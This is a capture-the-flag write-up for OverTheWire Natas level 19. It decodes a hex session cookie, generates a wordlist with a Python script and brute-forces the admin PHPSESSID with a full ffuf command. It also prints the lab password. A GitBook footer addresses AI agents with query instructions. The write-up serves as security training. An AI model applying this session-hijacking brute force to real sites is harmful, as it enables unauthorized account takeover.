> For the complete documentation index, see [llms.txt](https://thamizhiniyancs.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://thamizhiniyancs.gitbook.io/writeups/overthewire/natas/level-18-level-19.md). # Level 18 - Level 19 ``` Username: natas19 Password: 8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s URL: http://natas19.natas.labs.overthewire.org ``` ## Overview This time we got the same login page that we got in the last level and its clearly mentioned that the source code is almost same, but the session id's will be random.

Let's first get the session id by trying to login with some random credentials.

*** ## Decoding the Cookie The session id we got was some random encoded string. I tried to decode the session id's by some basic encoding schemes in cyber chef and was able to decode the string using `From Hex` scheme.

The string that we got after decoding is `-admin`. *** ## Brute-forcing Session ID Since we know all the possible id's, we can generate a word list of all possible `-admin` sessions ids with Hex encoding. The wordlist can be generated using the following python script. ```python #! /usr/bin/python wordlist = open("hex_640.txt", "w") cookies = [f"{i}-admin".encode("utf-8").hex() + "\n" for i in range(0, 641)] wordlist.writelines(cookies) wordlist.close() ``` Now we have successfully generated the word list by executing the above python script.

Now its time to use ffuf to brute-force the session id's. {% code lineNumbers="true" %} ```python ffuf -w hex_640.txt:FUZZ \ -u $'http://natas19.natas.labs.overthewire.org/index.php' \ -X $'POST' \ -H $'Host: natas19.natas.labs.overthewire.org' \ -H $'Content-Length: 31' -H $'Cache-Control: max-age=0' \ -H $'Authorization: Basic bmF0YXMxOTo4TE1KRWhLRmJNS0lMMm14UUtqdjBhRURkazd6cFQwcw==' \ -H $'Upgrade-Insecure-Requests: 1' \ -H $'Origin: http://natas19.natas.labs.overthewire.org' \ -H $'Content-Type: application/x-www-form-urlencoded' \ -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36' \ -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \ -H $'Referer: http://natas19.natas.labs.overthewire.org/' \ -H $'Accept-Encoding: gzip, deflate, br' \ -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \ -H $'Connection: close' \ -b $'PHPSESSID=FUZZ' \ -d $'username=admin&password=somoene' \ -fr "You are logged in as a regular user." ``` {% endcode %} From the results of `ffuf`, we can get the valid admin cookie.

*** ## Getting the Password Now let's replace the session id with the id we found using ffuf and refresh the page to get the credentials for next level.

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://thamizhiniyancs.gitbook.io/writeups/overthewire/natas/level-18-level-19.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.